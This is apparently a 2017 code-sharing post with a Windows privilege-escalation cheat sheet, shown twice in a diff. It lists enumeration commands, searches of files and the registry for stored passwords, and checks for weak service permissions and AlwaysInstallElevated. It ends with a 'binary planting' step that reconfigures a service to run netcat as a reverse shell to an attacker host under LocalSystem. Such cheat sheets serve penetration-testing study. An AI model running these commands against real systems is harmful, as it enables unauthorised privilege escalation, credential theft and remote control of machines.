totoroha · December 30, 2017 16:29
diff --git a/windows_privesc b/windows_privesc
 // What system are we connected to?
 systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

 // Get the hostname and username (if available)
 hostname
 echo %username%

 // Get users
 net users
 net user [username]

 // Networking stuff
 ipconfig /all

 // Printer?
 route print

 // ARP-arific
 arp -A

 // Active network connections
 netstat -ano

 // Firewall fun (Win XP SP2+ only)
 netsh firewall show state
 netsh firewall show config

 // Scheduled tasks
 schtasks /query /fo LIST /v

 // Running processes to started services
 tasklist /SVC
 net start

 // Driver madness
 DRIVERQUERY

 // WMIC fun (Win 7/8 -- XP requires admin)
 wmic /?
 # Use wmic_info script!

 // WMIC: check patch level
 wmic qfe get Caption,Description,HotFixID,InstalledOn

 // Search pathces for given patch
 wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."

 // AlwaysInstallElevated fun
 reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
 reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

 // Other commands to run to hopefully get what we need
 dir /s *pass* == *cred* == *vnc* == *.config*
 findstr /si password *.xml *.ini *.txt
 reg query HKLM /f password /t REG_SZ /s
 reg query HKCU /f password /t REG_SZ /s

 // Service permissions
 sc query
 sc qc [service_name]

 // Accesschk stuff
 accesschk.exe /accepteula (always do this first!!!!!)
 accesschk.exe -ucqv [service_name] (requires sysinternals accesschk!)
 accesschk.exe -uwcqv "Authenticated Users" * (won't yield anything on Win 8)
 accesschk.exe -ucqv [service_name]

 // Find all weak folder permissions per drive.
 accesschk.exe -uwdqs Users c:\
 accesschk.exe -uwdqs "Authenticated Users" c:\

 // Find all weak file permissions per drive.
 accesschk.exe -uwqs Users c:\*.*
 accesschk.exe -uwqs "Authenticated Users" c:\*.*

 // Binary planting
 sc config [service_name] binpath= "C:\nc.exe -nv [RHOST] [RPORT] -e C:\WINDOWS\System32\cmd.exe"
 sc config [service_name] obj= ".\LocalSystem" password= ""
 sc qc [service_name] (to verify!)
 net start [service_name]

 Mostly all of this taken from http://www.fuzzysecurity.com/tutorials/16.html
	// What system are we connected to?
	systeminfo \| findstr /B /C:"OS Name" /C:"OS Version"

	// Get the hostname and username (if available)
	hostname
	echo %username%

	// Get users
	net users
	net user [username]

	// Networking stuff
	ipconfig /all

	// Printer?
	route print

	// ARP-arific
	arp -A

	// Active network connections
	netstat -ano

	// Firewall fun (Win XP SP2+ only)
	netsh firewall show state
	netsh firewall show config

	// Scheduled tasks
	schtasks /query /fo LIST /v

	// Running processes to started services
	tasklist /SVC
	net start

	// Driver madness
	DRIVERQUERY

	// WMIC fun (Win 7/8 -- XP requires admin)
	wmic /?
	# Use wmic_info script!

	// WMIC: check patch level
	wmic qfe get Caption,Description,HotFixID,InstalledOn

	// Search pathces for given patch
	wmic qfe get Caption,Description,HotFixID,InstalledOn \| findstr /C:"KB.." /C:"KB.."

	// AlwaysInstallElevated fun
	reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
	reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

	// Other commands to run to hopefully get what we need
	dir /s pass == cred == vnc == .config
	findstr /si password .xml .ini *.txt
	reg query HKLM /f password /t REG_SZ /s
	reg query HKCU /f password /t REG_SZ /s

	// Service permissions
	sc query
	sc qc [service_name]

	// Accesschk stuff
	accesschk.exe /accepteula (always do this first!!!!!)
	accesschk.exe -ucqv [service_name] (requires sysinternals accesschk!)
	accesschk.exe -uwcqv "Authenticated Users" * (won't yield anything on Win 8)
	accesschk.exe -ucqv [service_name]

	// Find all weak folder permissions per drive.
	accesschk.exe -uwdqs Users c:\
	accesschk.exe -uwdqs "Authenticated Users" c:\

	// Find all weak file permissions per drive.
	accesschk.exe -uwqs Users c:\.
	accesschk.exe -uwqs "Authenticated Users" c:\.

	// Binary planting
	sc config [service_name] binpath= "C:\nc.exe -nv [RHOST] [RPORT] -e C:\WINDOWS\System32\cmd.exe"
	sc config [service_name] obj= ".\LocalSystem" password= ""
	sc qc [service_name] (to verify!)
	net start [service_name]

	Mostly all of this taken from http://www.fuzzysecurity.com/tutorials/16.html